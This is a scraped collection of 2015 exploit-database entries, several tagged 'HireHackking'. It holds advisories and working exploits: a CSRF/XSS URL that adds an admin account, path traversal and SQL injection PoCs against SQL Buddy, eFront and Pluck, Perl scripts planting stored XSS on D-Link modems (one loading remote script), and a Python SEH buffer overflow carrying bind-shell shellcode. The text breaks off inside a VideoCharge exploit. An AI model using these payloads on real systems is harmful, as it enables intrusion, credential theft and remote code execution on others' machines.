http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E


Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web
vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.
HireHackking 
# Exploit Title: Path traversal vulnerability
# Google Dork: intitle:path traversal
# Date: 05-08-2015
# Exploit Author:  John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.sqlbuddy.com
# Software Link: http://www.sqlbuddy.com
# Version: 1.3.3
# Tested on: windows 7
# Category: webapps

Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt


Product:
===============================
SQL Buddy is an open source web based MySQL administration application.


Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter any non PHP will be returned
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploit payloads:
=======================

1-Read from Apache restricted directory under htdocs:
  http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
  http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
  http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo



Severity Level:
===============
High


Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
                                [+] #page=somefile

Affected Area(s):
                                [+] Server directories & sensitive files


Solution - Fix & Patch:
=======================
N/A



Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.

Domains:  hyp3rlinx.altervista.org
HireHackking 
eFront 3.6.15 PHP Object Injection Vulnerability

[+] Author: Filippo Roncari
[+] Target: eFront 
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it 


[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. 


[+] Vulnerability Details
eFront 3.6.15 is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated as a Professor, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.


[+] Technical Details
A PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non-sanitized user input. 

	[!] File: libraries/includes/copy.php
	-----------------------------
	if ($_GET['transfered']) {
		$transferedNodesCheck = unserialize($_GET['transfered']); 
	}
	$copiedTests = array();
	$copiedUnits = array();
	$map = array();
	foreach ($nodeOrders as $value) {
			list($id, $parentContentId) = explode("-", $value);
			if (!in_array($id, $transferedNodesCheck)) {
	-----------------------------

The injection affects the "transfered" parameter.


[+] Proof of Concept (PoC)


	[!] HTTP Request
	-----------------------------
	GET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[SERIALIZED_ARBITRARY_OBJECT]&mode&a jax=ajax&csrf_id=6ebb0b3aee60a1764e780e8494985a8e HTTP/1.1
	Host: localhost
	Proxy-Connection: keep-alive
	Accept: text/javascript, text/html, application/xml, text/xml, */*
	X-Prototype-Version: 1.7
	X-Requested-With: XMLHttpRequest
	Cookie: display_all_courses=1; setFormRowsHidden=0; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; professor_sidebar=hidden; professor_sidebarMode=automatic; parent_sid=6ebb0b3aee60a1764e780e8494985a8e
	-----------------------------

A common way to exploit this vulnerability is to find a PHP magic method that can be abused and inject a properly crafted arbitrary object in order to trigger it. Although a deeper analysis has not been performed, no useful PHP magic methods have been identified in order to exploit this specific vulnerability. Because the unmarshalled user input $transferedNodesCheck is exclusively used within an in_array() call, only __wakeup() and __destruct() methods could be abused to exploit the issue. However, none of those lends itself to the purpose. The vulnerability could still be abused in case of PHP vulnerable version (e.g., CVE-2014-8142) to create denial of service, leak memory and, under certain conditions, execute code.


[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
HireHackking 
eFront 3.6.15 Path Traversal Vulnerability

[+] Author: Filippo Roncari
[+] Target: eFront 
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it 


[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. 


[+] Vulnerability Details
eFront 3.6.15 is prone to a critical path traversal vulnerability involving the view_file.php module, due to improper user-input sanitization and unsafe inner normalize() function logic. Any unprivilieged attacker could exploit this vulnerability by manipulating HTTP parameter value in order to climb the directories tree and access arbitrary files on the remote file system. This issue can lead to critical confidentiality violations, depending on the privileges assigned to the application server.


[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.


[+] Proof of Concept (PoC)

	[!] PoC URL
	-----------------------------
	http://target.site/www/view_file.php?action=download&file=/[EFRONT_BASE_PATH]/../../../../../../etc/passwd/
	_____________________________

	[!] HTTP Request
	-----------------------------
	GET /test/efront/www/view_file.php?action=download&file=/Applications/MAMP/htdocs/test/efront/../../../../../etc/passwd/ HTTP/1.1
	Host: localhost
	Cookie: display_all_courses=1; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; SQLiteManager_currentLangue=6;
	PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; parent_sid=d36bed784e063e65cf31721f8ec7a0bd
	-----------------------------

	[!] HTTP Response
	-----------------------------
	HTTP/1.1 200 OK
	Date: Mon, 30 Mar 2015 13:20:43 GMT Content-Description: File Transfer
	Content-Disposition: attachment; filename="passwd" Content-Transfer-Encoding: binary
	Expires: 0
	Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public
	Content-Length: 5253
	Content-Type: application/download

	##
	# User Database #
	# Note that this file is consulted directly only when the system is running
	# in single-user mode. At other times this information is provided by
	# Open Directory. #
	# See the opendirectoryd(8) man page for additional information about
	# Open Directory.
	##
	nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh
	daemon:*:1:1:System Services:/var/root:/usr/bin/false
	_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false

	[...]
	_____________________________

For technical details and explanations check the full advisory.	


[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
HireHackking 
eFront 3.6.15 Multiple SQL Injection Vulnerabilities

[+] Author: Filippo Roncari | Luca De Fulgentis
[+] Target: eFront 
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it 


[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. 


[+] Vulnerability Details
The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges.


[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.


[+] Proof of Concept (PoC)
Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that:
1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request.
2. If logged as a Student, a potential attacker has to access a lesson for which his User Type has “content” set to hidden. 
3. The default theme, or others that use the sidebar, must be in use.

	[!] PoC URL
	-----------------------------
	http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1 
	-----------------------------

The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu.

	[!] HTTP Response
	-----------------------------
	HTTP/1.1 200 OK
	Date: Thu, 09 Apr 2015 22:42:19 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html
	Content-Length: 28786

	[...]
	<div class = "menuOption" name="lessonSpecific" id="forum_a" > <table>
	<tr> <td>
	target="mainframe">
	<a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b"
	<img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a>
	</td>
	<td class = "menuListOption" >
	<a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a>
	</td> </tr>
	</table> </div>
	[...]
	-----------------------------


For further details and explanations check the full advisory.	


[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
HireHackking 
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

	my $ip = $ARGV[0];

	my $user = $ARGV[1];

	my $pass = $ARGV[2];
		

		if (@ARGV != 3){

			print "\n";
			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

		}else{

			$ip = $1 if($ip=~/(.*)\/$/);

			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "[+] Exploring $ip\/ ...\n";

			my $payload = "%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E";
			
			my $ua = new LWP::UserAgent;

			my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

			$hdrs->authorization_basic($user, $pass);
			
			chomp($ip);

			
			print "[+] Preparing exploit...\n";
			
			my $url_and_xpl = "$ip/todmngr.tod?action=add&username=$payload&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840";
						
			my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

			print "[+] Prepared!\n";
			
			print "[+] Requesting and Exploiting...\n";
			
			my $resp = $ua->request($req);

			if ($resp->is_success){

			print "[+] Successfully Requested!\n";
			
			
				my $url = "$ip/todmngr.tod?action=view";
			
				$req = new HTTP::Request("GET",$url,$hdrs);

				print "[+] Checking that was explored...\n";
				
				
				my $resp2 = $ua->request($req);
				
				
				if ($resp2->is_success){

				my $resultado = $resp2->as_string;
				
							if(index($resultado, uri_unescape($payload)) != -1){
							
							print "[+] Successfully Exploited!";

							}else{
							
							print "[-] Not Exploited!";
							
							}
				}

			}else {

			print "[-] Ops!\n";
			print $resp->message;

			}


}
HireHackking 
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

	my $ip = $ARGV[0];

	my $user = $ARGV[1];

	my $pass = $ARGV[2];
		

		if (@ARGV != 3){

			print "\n";
			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

		}else{

			$ip = $1 if($ip=~/(.*)\/$/);

			print "XLabs Information Security www.xlabs.com.br\n";
			print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
			print "Developed by Mauricio Correa\n";
			print "Contact: mauricio\@xlabs.com.br\n";
			print "[+] Exploring $ip\/ ...\n";

			my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";
			
			my $ua = new LWP::UserAgent;

			my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

			$hdrs->authorization_basic($user, $pass);
			
			chomp($ip);

			
			print "[+] Preparing exploit...\n";
			
			my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";
						
			my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

			print "[+] Prepared!\n";
			
			print "[+] Requesting and Exploiting...\n";
			
			my $resp = $ua->request($req);

			if ($resp->is_success){

			print "[+] Successfully Requested!\n";
			
			
				my $url = "$ip/todmngr.tod?action=urlview";
			
				$req = new HTTP::Request("GET",$url,$hdrs);

				print "[+] Checking that was explored...\n";
				
				
				my $resp2 = $ua->request($req);
				
				
				if ($resp2->is_success){

				my $resultado = $resp2->as_string;
				
							if(index($resultado, uri_unescape($payload)) != -1){
							
								print "[+] Successfully Exploited!";

							}else{
							
								print "[-] Not Exploited!";
							
							}
				}

			}else {

				print "[-] Ops!\n";
				print $resp->message;

			}


}
HireHackking 
# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################
HireHackking 
#!/usr/bin/python
# Exploit Title		: i.FTP 2.21 Time Field SEH Exploit
# Exploit Author	: Revin Hadi S
# Vulnerability PoC	: Avinash Kumar Thapa "-Acid"
# PoC Link		: https://www.exploit-db.com/exploits/36847/
# Date			: 05/08/2015
# Vendor		: http://www.memecode.com/iftp.php
# Software Link		: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version		: 2.21
# Tested On		: Win 7 SP1 Eng & Win XP SP2
# Triggering Exploit	: Go to Schedule > Schedule download > {+} >Time field

# msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_upper BufferRegister=EAX -t c
shellcode = ("\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x33\x30\x53\x30\x53\x30\x35\x30\x4b\x39"
"\x4a\x45\x30\x31\x4e\x32\x55\x34\x4c\x4b\x31\x42\x46\x50\x4c"
"\x4b\x51\x42\x54\x4c\x4c\x4b\x46\x32\x35\x44\x4c\x4b\x54\x32"
"\x57\x58\x54\x4f\x38\x37\x31\x5a\x31\x36\x50\x31\x4b\x4f\x36"
"\x51\x59\x50\x4e\x4c\x47\x4c\x53\x51\x53\x4c\x44\x42\x56\x4c"
"\x47\x50\x49\x51\x48\x4f\x54\x4d\x43\x31\x39\x57\x4d\x32\x4a"
"\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x34\x50\x4c\x4b\x51\x52"
"\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x51\x50\x54\x38\x4d\x55\x39"
"\x50\x32\x54\x50\x4a\x45\x51\x58\x50\x56\x30\x4c\x4b\x50\x48"
"\x44\x58\x4c\x4b\x36\x38\x47\x50\x33\x31\x48\x53\x5a\x43\x47"
"\x4c\x30\x49\x4c\x4b\x36\x54\x4c\x4b\x33\x31\x38\x56\x46\x51"
"\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x38\x4f\x44\x4d\x55"
"\x51\x48\x47\x46\x58\x4d\x30\x33\x45\x4b\x44\x44\x43\x53\x4d"
"\x4a\x58\x47\x4b\x43\x4d\x47\x54\x54\x35\x5a\x42\x30\x58\x4c"
"\x4b\x31\x48\x51\x34\x53\x31\x49\x43\x52\x46\x4c\x4b\x44\x4c"
"\x30\x4b\x4c\x4b\x36\x38\x45\x4c\x55\x51\x4e\x33\x4c\x4b\x55"
"\x54\x4c\x4b\x43\x31\x38\x50\x4b\x39\x57\x34\x37\x54\x37\x54"
"\x31\x4b\x51\x4b\x53\x51\x51\x49\x51\x4a\x46\x31\x4b\x4f\x4d"
"\x30\x31\x48\x51\x4f\x31\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x46"
"\x31\x4d\x33\x58\x46\x53\x47\x42\x43\x30\x43\x30\x43\x58\x52"
"\x57\x42\x53\x36\x52\x31\x4f\x50\x54\x43\x58\x30\x4c\x52\x57"
"\x51\x36\x43\x37\x4b\x4f\x4e\x35\x38\x38\x4c\x50\x55\x51\x33"
"\x30\x35\x50\x46\x49\x4f\x34\x36\x34\x36\x30\x52\x48\x57\x59"
"\x4d\x50\x52\x4b\x53\x30\x4b\x4f\x58\x55\x46\x30\x50\x50\x36"
"\x30\x30\x50\x31\x50\x46\x30\x31\x50\x50\x50\x35\x38\x4b\x5a"
"\x44\x4f\x39\x4f\x4d\x30\x4b\x4f\x39\x45\x4c\x49\x48\x47\x50"
"\x31\x49\x4b\x46\x33\x52\x48\x43\x32\x55\x50\x32\x36\x50\x42"
"\x4c\x49\x4b\x56\x52\x4a\x52\x30\x36\x36\x31\x47\x43\x58\x39"
"\x52\x59\x4b\x57\x47\x32\x47\x4b\x4f\x39\x45\x50\x53\x46\x37"
"\x32\x48\x38\x37\x4b\x59\x56\x58\x4b\x4f\x4b\x4f\x39\x45\x31"
"\x43\x51\x43\x30\x57\x35\x38\x33\x44\x5a\x4c\x57\x4b\x4b\x51"
"\x4b\x4f\x49\x45\x51\x47\x4c\x49\x4f\x37\x33\x58\x33\x45\x42"
"\x4e\x50\x4d\x33\x51\x4b\x4f\x59\x45\x32\x48\x32\x43\x42\x4d"
"\x52\x44\x43\x30\x4c\x49\x5a\x43\x46\x37\x51\x47\x31\x47\x30"
"\x31\x4a\x56\x52\x4a\x34\x52\x50\x59\x31\x46\x4a\x42\x4b\x4d"
"\x53\x56\x39\x57\x57\x34\x31\x34\x47\x4c\x53\x31\x55\x51\x4c"
"\x4d\x31\x54\x46\x44\x52\x30\x38\x46\x55\x50\x51\x54\x46\x34"
"\x30\x50\x30\x56\x36\x36\x46\x36\x50\x46\x31\x46\x50\x4e\x56"
"\x36\x46\x36\x50\x53\x30\x56\x55\x38\x53\x49\x58\x4c\x37\x4f"
"\x4c\x46\x4b\x4f\x59\x45\x4d\x59\x4b\x50\x50\x4e\x46\x36\x50"
"\x46\x4b\x4f\x50\x30\x53\x58\x43\x38\x4d\x57\x45\x4d\x35\x30"
"\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x58\x35\x39\x32\x56\x36\x33"
"\x58\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x37\x4c"
"\x35\x56\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x33\x45\x44"
"\x45\x4f\x4b\x47\x37\x42\x33\x32\x52\x52\x4f\x52\x4a\x35\x50"
"\x31\x43\x4b\x4f\x39\x45\x41\x41")

# Align Shellcode to EAX register
align = "\x58"*3		# POP EAX; POP EAX; POP EAX
align += "\x2d\x77\x77\x77\x77"	# SUB EAX, 0x77777777
align += "\x2d\x77\x33\x33\x33"	# SUB EAX, 0x33333377
align += "\x2d\x77\x22\x22\x22"	# SUB EAX, 0x22222277
align += "\x2d\x3b\x32\x33\x33"	# SUB EAX, 0x3333323b

buffer = "A"*300
buffer += "\x40\x75\x21\x40"	
buffer += "\x67\x59\x02\x10"	# /p/p/r Lgi.dll
buffer += "DOGE"*7		
buffer += align		
buffer += "\x43"*37		
buffer += shellcode

f = open("evil.txt", "wb")
f.write(buffer)
f.close()
HireHackking 
#!/usr/bin/python
# Exploit Title: VideoCharge v3.16.4.06
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com 
# Version: 3.16.4.06
# Tested on: Win XP3
# Software link: http://www.softpedia.com/dyn-postdownload.php/36f0ea5a24f3=
f5f49eb4e12a379b1874/554f2748/a3a/0/1
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
#        All third party modules are SAFESEH'ed
#        A bigger buffer of > 1000 & <3000 A's will also crash the program =
but you'd have to
#        use the SEH route which will make for a good exercise since the pr=
ogram only
#        ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+=
ret, jmp[reg] or call[reg] )
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
